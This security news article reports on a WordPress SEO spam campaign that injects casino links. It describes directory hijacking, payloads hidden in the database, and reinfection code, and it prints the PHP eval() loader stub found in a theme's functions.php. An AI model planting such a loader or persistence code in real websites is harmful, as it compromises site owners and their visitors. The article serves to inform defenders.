Cybercriminals are increasingly targeting websites to inject malicious links and boost their search engine optimization rankings through sophisticated blackhat SEO tactics.
This campaign primarily focuses on online casino spam, which has become the most prevalent type of spam content affecting compromised websites.
Attackers exploit vulnerabilities in WordPress installations to insert spam content promoting online casinos, particularly those targeting international markets where gambling remains heavily regulated.
The attackers employ multiple techniques to maintain persistence and evade detection. They hijack legitimate website pages by creating duplicate directories with identical names, effectively replacing original content with spam-filled landing pages.
When visitors or search engines attempt to access pages, they are redirected to bogus directories containing links to undesirable casino websites.
This technique exploits how Apache and Nginx web servers resolve filesystem paths before handing requests to WordPress rewrite engines.
Sucuri security researchers identified a particularly sophisticated variant of this malware that incorporates multiple layers of redundancy.
The malicious code is strategically planted in both theme and plugin files to ensure survival even if one component is discovered.
Rather than creating easily detectable spam directories, this advanced version stores its payload within the WordPress database using deceptive option names.
Multi-Layered Infection Mechanism
The infection operates through clever database manipulation and dynamic content fetching.
Researchers discovered malicious code embedded at the bottom of the theme’s functions.php file.
.webp "Threat Actors Actively Hacking Websites to Inject Malicious Links and Boost their SEO 3")
The code retrieves a base64-encoded payload from the database using the option name wp_footers_logic and executes it through PHP’s eval() function:-
$cloak = get_option('wp_footers_logic');
if ($cloak) {
$decoded = base64_decode($cloak);
eval($decoded);
}If eval() is disabled, the malware writes the payload to wp-content/cache/style.dat as a fallback mechanism. The decoded payload monitors incoming requests for specific URL paths, checking for cached spam content.
When triggered, it fetches content from attacker-controlled domains like browsec[.]xyz. To ensure persistence, attackers plant reinfection code in additional plugin files. This code periodically searches for distinctive markers.
If markers are missing, the code automatically reappends the malicious payload to both the theme’s functions.php file and the primary file of the first active plugin, demonstrating sophisticated SEO spam campaigns.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
